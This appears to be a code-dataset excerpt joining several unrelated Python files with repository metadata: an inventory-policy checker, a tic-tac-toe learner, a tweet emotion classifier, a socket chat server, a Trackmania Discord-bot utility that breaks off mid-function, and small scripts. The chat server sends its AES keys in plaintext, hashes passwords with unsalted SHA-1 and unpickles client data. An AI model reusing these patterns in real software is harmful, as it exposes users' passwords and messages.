return pd.Series(
{
"check_sSaQ_S_gt_s": S_gt_s,
"check_sSaQ_s_gt_a": s_gt_a,
"check_sSaQ_order_quantity_to_params": order_quantity_to_params,
}
)
def _check_sSbQ(self, row):
S_gt_s = row["S"] >= row["s"] + 1
s_gt_b = row["s"] >= row["beta"] + 1
if row["inventory position"] < row["beta"]:
order_quantity_to_params = row["order quantity"] == row["Q"]
elif row["inventory position"] < row["s"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{
"check_sSbQ_S_gt_s": S_gt_s,
"check_sSbQ_s_gt_b": s_gt_b,
"check_sSbQ_order_quantity_to_params": order_quantity_to_params,
}
)
| 37.679458 | 107 | 0.557453 | 16,262 | 0.974239 | 0 | 0 | 0 | 0 | 0 | 0 | 3,756 | 0.225018 |
1fe41f5dc40be297773f566df8109a75b70ca3b8
| 3,623 |
py
|
Python
|
ch1/tictactoe.py
|
T0nyX1ang/Reinforcement-Learning
|
a86ab92ee628b95c7dbe432c079b7ce04b5e982a
|
[
"MIT"
] | null | null | null |
ch1/tictactoe.py
|
T0nyX1ang/Reinforcement-Learning
|
a86ab92ee628b95c7dbe432c079b7ce04b5e982a
|
[
"MIT"
] | null | null | null |
ch1/tictactoe.py
|
T0nyX1ang/Reinforcement-Learning
|
a86ab92ee628b95c7dbe432c079b7ce04b5e982a
|
[
"MIT"
] | null | null | null |
import random
import json
class TTTGame(object):
def __init__(self):
self._board = [0] * 9
self._end = False
with open('learning.json', 'r') as f:
self._state = json.loads(f.read())
self._alpha = 0.05
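        # learning rate (step size) for the temporal-difference value updates below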
def judge(self, state):
if (sum(state[0: 3]) == 3 or \
sum(state[3: 6]) == 3 or \
sum(state[6::]) == 3 or \
sum(state[0::3]) == 3 or \
sum(state[1::3]) == 3 or \
sum(state[2::3]) == 3 or \
sum(state[0::4]) == 3 or \
sum(state[2:7:2]) == 3):
self._end = True
return 1
elif (sum(state[0: 3]) == -3 or \
sum(state[3: 6]) == -3 or \
sum(state[6::]) == -3 or \
sum(state[0::3]) == -3 or \
sum(state[1::3]) == -3 or \
sum(state[2::3]) == -3 or \
sum(state[0::4]) == -3 or \
sum(state[2:7:2]) == -3):
self._end = True
return 0
elif 0 not in state:
self._end = True
            return 0.5  # can be set to 0 if you need a sharper winning criterion.
else:
self._end = False
if str(state) not in self._state:
self._state[str(state)] = 0.5 # move state
return self._state[str(state)] # study starts from here ...
def random_move(self, move_type=-1):
self.judge(self._board)
if (self._end):
return '[End]'
empty = []
count = 0
for val in self._board:
if (val == 0):
empty.append(count)
count += 1
select = empty[random.randint(0, len(empty) - 1)]
move_board = self._board.copy()
move_board[select] = move_type
value = self.judge(move_board)
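        # TD(0) update: move the stored value of the current board a step of size alpha
        # toward the value of the board reached by this move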
self._state[str(self._board)] = self._state[str(self._board)] + self._alpha * (value - self._state[str(self._board)]) # update move
self._board = move_board.copy()
return select
def greedy_move(self, move_type=1):
self.judge(self._board)
if (self._end):
return '[End]'
selects = []
max_value = -1
count = 0
for val in self._board:
if (val == 0):
move_board = self._board.copy()
move_board[count] = move_type
value = self.judge(move_board)
if (value > max_value):
selects = [count]
max_value = value
elif (value == max_value):
selects.append(count)
count += 1
select = random.sample(selects, 1)[0]
move_board = self._board.copy()
move_board[select] = move_type
value = self.judge(move_board)
self._state[str(self._board)] = self._state[str(self._board)] + self._alpha * (value - self._state[str(self._board)]) # update move
self._board = move_board.copy()
return select
def play(self):
self._board = [0] * 9
self._end = False
while not self._end:
s1 = self.greedy_move()
s2 = self.random_move()
# print('greedy selection:', s1, 'random selection:', s2)
def train(self, epoch=1000):
for i in range(0, epoch):
self.play()
def dump_state(self):
with open('learning.json', 'w') as f:
f.write(json.dumps(self._state))
def pretty_print_board(self):
print(self._board[0], self._board[1], self._board[2])
print(self._board[3], self._board[4], self._board[5])
print(self._board[6], self._board[7], self._board[8])
def combat(self):
self._board = [0] * 9
self._end = False
while not self._end:
s1 = self.greedy_move()
self.pretty_print_board()
print("Winning prob:", self.judge(self._board))
if (self._end):
print('You lose / a tie!')
break
s2 = input('Please enter your move: ')
while self._board[int(s2)] != 0:
s2 = input('Please enter your move: ')
self._board[int(s2)] = -1
self.pretty_print_board()
print("Winning prob:", self.judge(self._board))
self.judge(self._board)
if (self._end):
print('You win!')
if __name__ == '__main__':
tttg = TTTGame()
tttg.combat()
tttg.train(100000)
tttg.dump_state()
| 27.037313 | 134 | 0.619928 | 3,493 | 0.964118 | 0 | 0 | 0 | 0 | 0 | 0 | 352 | 0.097157 |
1fe4750a23a26455a9111641d38426011cdda650
| 141 |
py
|
Python
|
Chapter 03/ch3_1_38.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 03/ch3_1_38.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 03/ch3_1_38.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
str1 = ' Happy Life '
str2 = ' Happy Life '
if (str1.strip()== str2.strip()):
print("Same")
else:
print("Not same")
# same
| 17.625 | 34 | 0.531915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 0.390071 |
1fe4a5c508f25892277d20cf17891a3088bcee69
| 2,601 |
py
|
Python
|
text_analytic_emotion_load_only.py
|
agussuarjaya/Text_Analytic_-Emotion-
|
01cdf6f3661eaad2cb76111ebaee90ec50b592f0
|
[
"MIT"
] | null | null | null |
text_analytic_emotion_load_only.py
|
agussuarjaya/Text_Analytic_-Emotion-
|
01cdf6f3661eaad2cb76111ebaee90ec50b592f0
|
[
"MIT"
] | 1 |
2020-03-28T16:06:04.000Z
|
2020-03-29T02:03:44.000Z
|
text_analytic_emotion_load_only.py
|
agussuarjaya/Text_Analytic_-Emotion-
|
01cdf6f3661eaad2cb76111ebaee90ec50b592f0
|
[
"MIT"
] | 2 |
2020-03-28T15:02:48.000Z
|
2020-03-29T12:27:50.000Z
|
# -*- coding: utf-8 -*-
"""Text Analytic (Emotion) - load_only.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ec4JMQZ5zoj-PB_a0mUkJWRKotgQSd9f
"""
"""
Text Analytic (Emotion) with TensorFlow
Copyright 2020 I Made Agus Dwi Suarjaya
Gede Ocha Dipa Ananda
Ni Luh Putu Diah Putri Maheswari
Description : Try to analyze Tweets with TensorFlow and classify into 5 emotions (anger, happiness, sadness, love, fear)
Dataset source : https://raw.githubusercontent.com/meisaputri21/Indonesian-Twitter-Emotion-Dataset/master/Twitter_Emotion_Dataset.csv
"""
#Setup
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
import csv
import time
import ast
import numpy as np
import pandas as pd
#--------------------------------------------------------------------------------------------------------------------------
model_path = './1585378332_model'
encoder_path = './1585378332_encoder'
dict_path = './1585378332_dict'
#--------------------------------------------------------------------------------------------------------------------------
#Load the model (Optional for Transfer Learning)
reloaded_model = tf.keras.models.load_model(model_path)
model = reloaded_model
#Load the encoder (Optional for Transfer Learning)
encoder = tfds.features.text.TokenTextEncoder.load_from_file(encoder_path)
#Load the dictionary (Optional for Transfer Learning)
with open(dict_path) as dict_file:
d = ast.literal_eval(dict_file.readline())
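#d maps each predicted class index (argmax of the model output) back to one of the 5 emotion labels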
#Classify some tweets with model predict
tweet = []
tweet.append('Tahukah kamu, bahwa saat itu papa memejamkan matanya dan menahan gejolak dan batinnya. Bahwa papa sangat ingin mengikuti keinginanmu tapu lagi-lagi dia HARUS menjagamu?')
tweet.append('[Idm] My, masa gua tadi ketemu tmn SD yg pas SD ngejar gua dan ngasih surat tiap minggunya, asdfghjkl bgt, gk tau knp ngerasa takut gua :v hadeuh jaman SD ngerti apa coba :v')
tweet.append('Sedih bny penulisan resep yg tidak baku sdm, sdt, ruas, sejumput, secukupnya, even biji/buah termasuk tidak baku :(')
tweet.append('Paling nyampah org suka compare kan aku dgn org lain, dia dia ah aku aku ah. Tak suka boleh blah lah -__-')
tweet.append('Agak telat ramai nya ya dok...sudah paham sejak lama banget jadi geli aja baru pada ramai sekarang hehehe...')
for text in range(len(tweet)):
predictions = model.predict(encoder.encode(tweet[text]))
predictions[0]
print(d[np.argmax(predictions[0])], ' <- ', tweet[text])
| 38.820896 | 189 | 0.685506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,886 | 0.725106 |
1fe6e5bdf88233acf9a9c841722eff52d327f1f2
| 13,160 |
py
|
Python
|
Server.py
|
HackintoshwithUbuntu/Python-Chat-App
|
d5af370e33a092c52702efed6b1074d458c593ac
|
[
"MIT"
] | 2 |
2021-08-30T03:19:10.000Z
|
2021-09-06T21:51:02.000Z
|
Server.py
|
HackintoshwithUbuntu/Python-Chat-App
|
d5af370e33a092c52702efed6b1074d458c593ac
|
[
"MIT"
] | null | null | null |
Server.py
|
HackintoshwithUbuntu/Python-Chat-App
|
d5af370e33a092c52702efed6b1074d458c593ac
|
[
"MIT"
] | null | null | null |
# Imports
import socket # Communication
import threading # Communication with multiple users at once
import pickle # Serialising data
import hashlib # Hashing passwords
from Crypto.Cipher import AES # AES encryption algorithms
from Crypto.Random import get_random_bytes # For generating random keys and nonces
# A list of codes used in this program to prefix messages, so the client knows their meaning
'''
______________________________________
| CODE | MEANING |
|____________________________________|
? | Signup |
! | Signin |
$ | Control |
@ | Direct Message |
^ | Everyone Message |
* | Request list |
+ | New user online |
- | User logged off |
= | Request pics dict |
p | New profile pic |
_____________________________________|
'''
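# Example: a client that sends "@alice hello" asks the server to relay "hello" to the user "alice";
# the server forwards it to alice's socket as "@<sender> hello".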
# A dictionary storing usernames and passwords
logins = {}
# dictionary mapping each client socket to its username
record = {}
# dictionary mapping each username to its socket
records = {}
# dictionary to store username to server key
keys = {}
# Dictionary storing profile pictures
pics = {}
# List of usernames that are currently connected
connected_list = []
# A dictionary for working with logins (note: this is just so we can use the data in the file)
loginss = {}
# Starting the server socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Note: code skips to end as these function are not used until later
# A custom-made function for sending double-layer encrypted data to clients
def send_to_client(clientsocket, message, key):
# encrypt with our own key, they decrypt with ours
# Serialising message so it can be encrypted
msg = pickle.dumps(message)
# Creating a new cipher
cipher = AES.new(key, AES.MODE_EAX)
# Ciphering the data
# NOTE: WE ARE USING A RANDOMLY GENERATED NONCE, for second layer encryption
ciphered_data, tag = cipher.encrypt_and_digest(msg)
# Packing the data together and serialising it again so it can be sent
tosend = [cipher.nonce, tag, ciphered_data]
tosend = pickle.dumps(tosend)
# Send packaged data
clientsocket.send(tosend)
return
# A custom function to recieve client data, then decrypt, then verify
def client_receive(clientsocket, otherkey):
# Receive data
msg = clientsocket.recv(2048)
# Making sure client hasn't disconnected
if not msg:
return "disconnect"
else:
# Seperating packaged data
msg = pickle.loads(msg)
noonce = msg[0]
tag = msg[1]
data = msg[2]
# Creating cipher for decryption
cipher = AES.new(otherkey, AES.MODE_EAX, noonce)
# Verifying integrity of data using a tag
msg = cipher.decrypt_and_verify(data, tag)
# Deserialising data
msg = pickle.loads(msg)
return msg
# A custom function for sending data to all clients, except sender
def send_all(sender, message):
for i in connected_list:
if i == sender:
continue
# Finding the socket
receiversoc = records[i]
# Send data using above function
send_to_client(receiversoc, message, keys[i])
# A custom function for sending a message to all users
def msg_all(message, sender):
# Constructing so client knows what this message is
construct = "^"+ sender + " " + message
# Send data using above function
send_all(sender, construct)
# A custom function for telling all clients about a new logon
def new_online(user):
    # Constructing
construct = '+' + user
# Sending to all using function
send_all(user, construct)
# A custom function to check if a file exists without throwing errors
def file_exists(name):
filename = name + ".txt"
try:
my_file = open(filename)
my_file.close()
return True
except:
return False
# A utility function to allow quick updating of saved passwords and profile pictures
def updatefile(name, obj):
# Open file
with open(name, 'wb+') as file:
# Dump new data
pickle.dump(obj, file)
# The main function for communicating with clients on a new thread
# This handles most work and messaging duties
# NOTE: this is run on one thread per client
def on_new_client(clientsocket,addr):
# A string for storing username
username = ''
# Encryption Handshake
print("NETOWRK: Attempting handshake with: " + addr[0] + ":" + str(addr[1]))
# Generating a new COMPLETELY RANDOM key
key = get_random_bytes(16)
# Exchanging (not secure)
clientsocket.send(key)
# Receiving other key
otherkey = clientsocket.recv(1024)
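    # Each side now holds both 16-byte AES keys: 'key' encrypts traffic sent to this client,
    # 'otherkey' decrypts traffic received from it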
# Printing it on console
print("NETWORK: Server key: " + str(key) + ", "+ str(addr[0]) + ":" + str(addr[1]) + " key:", str(otherkey))
# Wrapped in try except to detect logging off of users
try:
        # Attempting sign in and sign up
while True:
# Receive data
login = client_receive(clientsocket, otherkey)
print("DEBUG: login / signup attempt", login)
# Making sure the client hasn't disconnected
if login == "disconnect":
clientsocket.close()
break
# Splitting username and password, clients have already validated input
user, passw = login[1:].split()
passw = passw.encode("utf-8")
# Hashing the password
passw = hashlib.sha1(passw)
# Storing hashed password in hex form
passw = passw.hexdigest()
print("DEBUG: Hashed password is: " + str(passw))
# if sign up else if login attempt
if(login[0] == '?'):
# Creating an account
# If user hasn't already signed up
if user not in loginss:
# Store username and password combo in memory
loginss[user] = passw;
# Tell the client
send_to_client(clientsocket, "$success-signup", key)
# Give them default profile pic
pics[user] = 0
# Update relevant storage
updatefile("loginss.txt", loginss)
updatefile("pic.txt", pics)
print("USERS:", user, "signed up")
else:
# Else tell them they failed
send_to_client(clientsocket, "$fail-signup", key)
print("USERS: Received failed signup")
continue
elif(login[0] == '!'):
# Logging in
# In a try except to prevent key errors
try:
if(loginss[user] == passw):
# This is a successful login
# Marking such on server
username = user
# Tell the client
send_to_client(clientsocket, "$success-login", key)
print("USERS:", username, "signed in")
break
else:
# Unsuccessful login
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
except:
# Probably key error, they need to sign up first
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
# Only if they have logged in successfully
if(username != ''):
# If they are not connected (should be almost always)
if username not in connected_list:
                # mark their username as connected
connected_list.append(username)
# Tell clients about new profile picture and new client username
send_all(username, "p"+str(pics[username])+" "+username)
new_online(username)
print("USERS: Sent", username, "is online")
# Record sockets and keys for easy access by utility functions
record[clientsocket] = username
records[username] = clientsocket
keys[username] = key
# Listen and act until told not to
while True:
# Receive using function
msg = client_receive(clientsocket, otherkey)
# Make sure client hasnt disconnected
if msg == "disconnect":
# If they have tell other clients and remove them from lists
connected_list.remove(username)
del keys[username]
clientsocket.close()
send_all("", "-"+username)
print("Users: " + username + " quit")
break
# Interpreting comands from clients using codes from the table at the top
if msg[0] == '@':
# Split message
recievername = msg[1:].split(" ", 1)
# Determine sockets and keys
receiversoc = records[recievername[0]]
reckey = keys[recievername[0]]
# Create message
tosend = "@" + username + " " + recievername[1]
print("MESSAGES: " + username + " SENT " + recievername[1] + " TO " + recievername[0])
# Send
send_to_client(receiversoc, tosend, reckey)
elif msg[0] == '^':
# Determine sendername
sendername = record[clientsocket]
# Remove whitespace
tosend = msg[1:].strip()
print("MESSAGES: " + sendername + " SENT " + tosend + " TO ALL USERS")
# Send to all using function
msg_all(tosend, sendername)
elif msg[0] == '*':
# If request connected list, send list
print("DEBUG:", username, "requested list")
send_to_client(clientsocket, connected_list, key)
elif msg[0] == 'p':
# Determine sendername
sendername = record[clientsocket]
# Update memory list and file
pics[sendername] = msg[1]
updatefile("pic.txt", pics)
# Tell other clients of updated picture
send_all('', msg + " " + sendername)
print("USERS:", sendername, "changed their profile picture to:", msg[1])
elif msg[0] == '=':
# If request pic dict, send pic dict
print("DEBUG:", username, "requested pics dict")
send_to_client(clientsocket, pics, key)
except:
# This is usually a logoff
try:
# This is when they are registered and logged in
clientsocket.close()
connected_list.remove(username)
del keys[username]
# Tell other clients
send_all("", "-"+username)
print("USERS: " + username + " quit")
except:
            # If they aren't registered, the above code will have already closed the socket, so just record and quit
print("USERS: Non-Authenicated user quit")
# Code skips to here
# Check if both files exist and populate memory with their contents it they do
# If they don't, set memory contents to empty and create files
# Also log it at the end, so the server runner knows what just happened
if file_exists("loginss") == False:
file = open("loginss.txt", "w+")
file.close()
with open('loginss.txt', 'rb') as file:
try:
loginss = pickle.load(file)
except:
print("DEBUG: Failed reading file (the login file is probably empty, no need to worry)")
if file_exists("pic") == False:
file = open("pic.txt", "w+")
file.close()
with open('pic.txt', 'rb') as file:
try:
pics = pickle.load(file)
except:
print("DEBUG: Failed reading file (the pic file is probably empty, no need to worry)")
# An empty host string binds the server to all available interfaces
host = ''
# Setting the port
port = 443
# Bind to the port
s.bind((host, port))
# Allow a backlog of up to ten pending connections
s.listen(10)
# Now wait for client connection.
print("DEBUG: Started on:", (host, port))
print("DEBUG: Ready for clients")
while True:
# Blocking call, waits to accept a connection
conn, addr = s.accept()
# Log it
print("NETWORK: Connected to " + addr[0] + ":" + str(addr[1]))
    # Start a new thread for the new client
threading.Thread(target=on_new_client, args=(conn,addr)).start()
print("\nDEBUG: Started new thread")
# Main thread continues the listening loop to assign new threads to new clients
# In the rare case we are here, close down the server socket gracefully and then quit
s.close()
| 38.820059 | 115 | 0.572188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,109 | 0.46421 |
1fe7b45de50e9ea21f771782230c1d73959dc62a
| 215 |
py
|
Python
|
devmine/config/environments/production.py
|
sniperkit/snk.fork.devmine-core
|
6ab43abd0c1041831ecb86dcba55ffd9e05ce615
|
[
"BSD-3-Clause"
] | null | null | null |
devmine/config/environments/production.py
|
sniperkit/snk.fork.devmine-core
|
6ab43abd0c1041831ecb86dcba55ffd9e05ce615
|
[
"BSD-3-Clause"
] | null | null | null |
devmine/config/environments/production.py
|
sniperkit/snk.fork.devmine-core
|
6ab43abd0c1041831ecb86dcba55ffd9e05ce615
|
[
"BSD-3-Clause"
] | null | null | null |
# server backend
server = 'cherrypy'
# debug error messages
debug = False
# auto-reload
reloader = False
# database url
db_url = 'sqlite:///devmine/db/devmine.db'
# echo database engine messages
db_echo = False
| 14.333333 | 42 | 0.730233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 139 | 0.646512 |
1fe923af70915246d98e2a502a9e9ce347a11d16
| 1,279 |
py
|
Python
|
gen_screens.py
|
shurkova/currentVers
|
25027f3f4faa9033b69041459f0785c1436c3f31
|
[
"CECILL-B"
] | 1 |
2020-09-09T15:30:38.000Z
|
2020-09-09T15:30:38.000Z
|
gen_screens.py
|
shurkova/currentVers
|
25027f3f4faa9033b69041459f0785c1436c3f31
|
[
"CECILL-B"
] | null | null | null |
gen_screens.py
|
shurkova/currentVers
|
25027f3f4faa9033b69041459f0785c1436c3f31
|
[
"CECILL-B"
] | 11 |
2020-05-01T09:03:14.000Z
|
2022-02-09T14:17:41.000Z
|
# generate 500 screens.
import random
objs = []
for i in range(500):
go_to = random.choice([2,3])
for j in range(go_to):
new_obj = {'name': 'non_exist', 'RBs': [], 'set': 'memory', 'analog': i}
width = round(random.random()*20)
hight = round(random.random()*10)
x = round(random.random()*300)
y = round(random.random()*800)
colour = random.choice([255, 155, 55, 100])
new_obj['RBs'].append({'pred_name': 'non_exist', 'pred_sem': [], 'higher_order': False, 'object_name': 'obj'+str(random.random()), 'object_sem': [['x_ext', 1, 'x_ext', 'nil', 'state'], ['x_ext'+str(width), 1, 'x_ext', width, 'value'], ['y_ext', 1, 'y_ext', 'nil', 'state'], ['y_ext'+str(hight), 1, 'y_ext', hight, 'value'], ['total_ext', 1, 'total_ext', 'nil', 'state'], ['total_ext'+str(width*hight), 1, 'total_ext', width*hight, 'value'], ['x', 1, 'x', 'nil', 'state'], ['x'+str(x), 1, 'x', width*hight, 'value'], ['y', 1, 'y', 'nil', 'state'], ['y'+str(x), 1, 'y', width*hight, 'value'], ['colour', 1, 'colour', 'nil', 'state'], [str(colour), 1, 'colour', colour, 'value']], 'P': 'non_exist'})
objs.append(new_obj)
write_file = open('screens.py', 'w')
write_file.write('simType=\'sim_file\' \nsymProps = ' + str(objs))
| 51.16 | 704 | 0.56294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 474 | 0.370602 |
1fec0bf47c009cdb0ca6fac21df153c55c6c1431
| 46,269 |
py
|
Python
|
bot/utils/trackmania.py
|
NottCurious/TMIndiaBot
|
824c171fa2f41aa21631796c384f70a34a721364
|
[
"MIT"
] | 1 |
2022-02-12T16:40:17.000Z
|
2022-02-12T16:40:17.000Z
|
bot/utils/trackmania.py
|
NottCurious/TMIndiaBot
|
824c171fa2f41aa21631796c384f70a34a721364
|
[
"MIT"
] | 78 |
2021-10-14T05:32:54.000Z
|
2022-01-21T09:22:37.000Z
|
bot/utils/trackmania.py
|
NottCurious/TMIndiaBot
|
824c171fa2f41aa21631796c384f70a34a721364
|
[
"MIT"
] | null | null | null |
import asyncio
import json
import os
import shutil
import typing
from datetime import datetime, timezone, timedelta
from matplotlib import pyplot as plt
import cv2
import country_converter as coco
import flag
import requests
import discord
from bot.api import APIClient
from bot.log import get_logger
from bot.utils.commons import Commons
from bot.utils.database import Database
from bot.utils.discord import EZEmbed
log = get_logger(__name__)
class TrackmaniaUtils:
"""Functions relating to a specific Trackmania player who is given while creating the object"""
def __init__(self, username: str):
self.username = username
self.api_client = APIClient()
async def close(self):
"""Closes the API Client"""
await self.api_client.close()
return
async def get_id(self) -> str:
"""Gets the ID of the Player from the API
        Returns:
            str: The ID of the player, or None if the username is not valid
"""
log.debug("Checking if the ID is in the file")
id = Database.retrieve_id(self.username)
if id is None:
log.debug("Getting the data from the TMIndiaBotAPI")
id_data = await self.api_client.get(
f"http://localhost:3000/tm2020/player/{self.username}/id",
raise_for_status=False,
)
try:
id = id_data["id"]
except KeyError:
id = None
log.debug("Storing the Username and ID to the file")
Database.store_id(self.username, id)
else:
log.debug("Username exists in file")
return id
async def get_player_data(
self, player_id: str
) -> typing.Union[list, discord.Embed, None]:
"""Gets the player data as a list of embeds
Page 1 contains the Zone, Zone Ranks and Metadata of the player
Page 2 contains the Matchmaking and Royal Data
Page 3 contains the individual trophy counts
Args:
player_id (str): The player's id
Returns:
            typing.Union[list, discord.Embed, None]: The player data in a list of 3 embeds.
If the player does not exist, returns a single error embed.
"""
log.debug(f"Getting Data for {player_id}")
raw_player_data = await self.api_client.get(
f"http://localhost:3000/tm2020/player/{player_id}"
)
log.debug("Getting Player Flag Unicode")
player_flag_unicode = self._get_player_country_flag(raw_player_data)
log.debug(f"Got Player Unicode flag -> {player_flag_unicode}")
display_name = raw_player_data["displayname"]
log.debug(f"Display Name is {display_name}")
log.debug("Checking if Player has Played the Game")
if raw_player_data["trophies"]["points"] == 0:
return [
EZEmbed.create_embed(
title=f"{player_flag_unicode} {display_name} has never played Trackmania 2020",
color=0xFF0000,
)
]
log.debug("Creating Two Embeds")
page_one = EZEmbed.create_embed(
title=f"Player Data for {player_flag_unicode} {display_name} - Page 1",
color=Commons.get_random_color(),
)
page_two = EZEmbed.create_embed(
title=f"Player Data for {player_flag_unicode} {display_name} - Page 2",
color=Commons.get_random_color(),
)
page_three = EZEmbed.create_embed(
title=f"Player Data for {player_flag_unicode} {display_name} - Page 3",
color=Commons.get_random_color(),
)
zones, zone_ranks = self._get_zones_and_positions(raw_player_data)
royal_data = self._get_royal_data(raw_player_data)
matchmaking_data = self._get_matchmaking_data(raw_player_data)
trophy_count = self._get_trophy_count(raw_player_data)
log.debug("Adding Zones and Zone Ranks to Page One")
page_one.add_field(name="Zones", value=zones, inline=False)
page_one.add_field(name="Zone Ranks", value=zone_ranks, inline=False)
log.debug("Adding Matchmaking and Royal Data to Page Two")
page_two.add_field(name="Matchmaking", value=matchmaking_data, inline=False)
page_two.add_field(name="Royal", value=royal_data, inline=False)
log.debug("Adding Trophy Count to Page Three")
page_three.add_field(name="Trophy Count", value=trophy_count, inline=False)
try:
log.debug("Adding Meta Data to Page One")
page_one = self._add_meta_details(page_one, raw_player_data)
log.debug("Added Meta Data to Page One")
except:
log.debug("Player does not have Meta Data")
log.debug(f"Returning {page_one}, {page_two} and {page_three}")
return [page_one, page_two, page_three]
async def get_cotd_data(self, user_id: str) -> discord.Embed:
log.debug(f"Requesting COTD Data for {user_id} (Username: {self.username})")
cotd_data = await self.api_client.get(
f"http://localhost:3000/tm2020/player/{user_id}/cotd"
)
try:
if cotd_data["error"]:
log.critical(f"{self.username} has never played a cotd")
return (
EZEmbed.create_embed(
title="This player has never played a COTD", colour=0xFF0000
),
None,
)
except:
pass
log.debug("Parsing Best Rank Overall Data")
best_rank_overall = COTDUtil.get_best_rank_overall(cotd_data)
best_div_overall = COTDUtil.get_best_div_overall(cotd_data)
best_div_rank_overall = COTDUtil.get_best_div_rank_overall(cotd_data)
log.debug("Parsed Best Rank Overall Data")
log.debug("Parsing Best Rank Primary Data")
best_rank_primary = COTDUtil.get_best_rank_primary(cotd_data)
best_div_primary = COTDUtil.get_best_div_primary(cotd_data)
best_div_rank_primary = COTDUtil.get_best_div_rank_primary(cotd_data)
log.debug("Parsed Best Rank Primary Data")
log.debug("Parsing Average Rank Overall Data")
average_rank_overall = COTDUtil.get_average_rank_overall(cotd_data)
average_div_overall = COTDUtil.get_average_div_overall(cotd_data)
average_div_rank_overall = COTDUtil.get_average_div_rank_overall(cotd_data)
log.debug("Parsed Average Rank Overall Data")
log.debug("Parsing Average Rank Primary Data")
average_rank_primary = COTDUtil.get_average_rank_primary(cotd_data)
average_div_primary = COTDUtil.get_average_div_primary(cotd_data)
average_div_rank_primary = COTDUtil.get_average_div_rank_primary(cotd_data)
log.debug("Parsed Average Rank Primary Data")
log.debug("Creating Strings for Embed")
best_data_overall = f"```Best Rank: {best_rank_overall}\nBest Div: {best_div_overall}\nBest Rank in Div: {best_div_rank_overall}\n```"
best_data_primary = f"```Best Rank: {best_rank_primary}\nBest Div: {best_div_primary}\nBest Rank in Div: {best_div_rank_primary}\n```"
average_data_overall = f"```Average Rank: {average_rank_overall}\nAverage Div: {average_div_overall}\nAverage Rank in Div: {average_div_rank_overall}\n```"
average_data_primary = f"```Average Rank: {average_rank_primary}\nAverage Div: {average_div_primary}\nAverage Rank in Div: {average_div_rank_primary}\n```"
log.debug("Created Strings for Embed")
log.debug("Creating Embed Page")
cotd_data_embed = EZEmbed.create_embed(
title=f"COTD Data for {self.username}", color=Commons.get_random_color()
)
log.debug("Created Embed Page")
log.debug("Adding Fields")
cotd_data_embed.add_field(
name="Best Data Overall", value=best_data_overall, inline=False
)
cotd_data_embed.add_field(
name="Best Data Primary (No Reruns)", value=best_data_primary, inline=False
)
cotd_data_embed.add_field(
name="Average Data Overall", value=average_data_overall, inline=False
)
cotd_data_embed.add_field(
name="Average Data Primary (No Reruns)",
value=average_data_primary,
inline=False,
)
log.debug("Added Fields")
cotd_data_embed.set_footer(
text="This function does not include COTDs where the player has left after the 15mins qualifying"
)
log.debug("Getting Rank Data for Plots")
ranks_overall = COTDUtil.get_list_of_ranks_overall(cotd_data)
ranks_primary = COTDUtil.get_list_of_ranks_primary(cotd_data)
log.debug("Getting IDs of Ranks for Plots")
dates_overall = COTDUtil.get_list_of_dates_overall(cotd_data)
dates_primary = COTDUtil.get_list_of_dates_primary(cotd_data)
log.debug("Getting IDs for Plot")
ids_overall = COTDUtil.get_list_of_ids_overall(cotd_data)
ids_primary = COTDUtil.get_list_of_ids_primary(cotd_data)
log.debug("Creating Plots for Ranks Overall and Ranks Primary")
# Use Threading here
log.debug("Creating Plot for Overall")
COTDUtil._create_rank_plot(
ranks=ranks_overall,
dates=dates_overall,
ids=ids_overall,
plot_name="Overall Ranks (With Reruns)",
image_name="overallranks",
)
log.debug("Creating Plot for Primary")
COTDUtil._create_rank_plot(
ranks=ranks_primary,
dates=dates_primary,
ids=ids_primary,
plot_name="Primary Rank Graph (No Reruns)",
image_name="primaryranks",
)
log.debug("Concatenating Both Graphs into One")
COTDUtil._concat_graphs()
log.debug("Opening Concatenated Graphs")
image = discord.File(
"./bot/resources/temp/concatenated_graphs.png",
filename="concatenated_graphs.png",
)
log.debug("Opened Concatenated graphs")
log.debug("Adding the Image to the Embed")
cotd_data_embed.set_image(url="attachment://concatenated_graphs.png")
return cotd_data_embed, image
def _get_player_country_flag(self, raw_player_data: dict):
"""Gets the country that the player is from as unicode characters"""
log.debug("Getting Zones")
try:
zone_one = raw_player_data["trophies"]["zone"]["name"]
zone_two = raw_player_data["trophies"]["zone"]["parent"]["name"]
log.debug(f"Zones -> {zone_one} and {zone_two}")
continents = (
"Asia",
"Middle East",
"Europe",
"North America",
"South America",
"Africa",
)
if zone_two in continents:
log.debug("Only First Zone is Required")
iso_letters = coco.convert(names=[zone_one], to="ISO2")
unicode_letters = flag.flag(iso_letters)
else:
log.debug("Need to use Zone Two")
iso_letters = coco.convert(names=[zone_two], to="ISO2")
unicode_letters = flag.flag(iso_letters)
log.debug(f"Unicode Letters are {unicode_letters}")
return unicode_letters
except:
log.error("Player has never played Trackmania 2020")
return ":flag_white:"
def _get_royal_data(self, raw_player_data: dict) -> str:
"""Gets the royal data of the player as a string"""
log.debug("Getting Player Data")
try:
royal_data = raw_player_data["matchmaking"][1]
rank = royal_data["info"]["rank"]
wins = royal_data["info"]["progression"]
current_div = royal_data["info"]["division"]["position"]
if wins != 0:
progression_to_next_div = (
round(
(wins - royal_data["info"]["division"]["minwins"])
/ (
royal_data["info"]["division"]["maxwins"]
- royal_data["info"]["division"]["minwins"]
+ 1
),
4,
)
* 100
)
else:
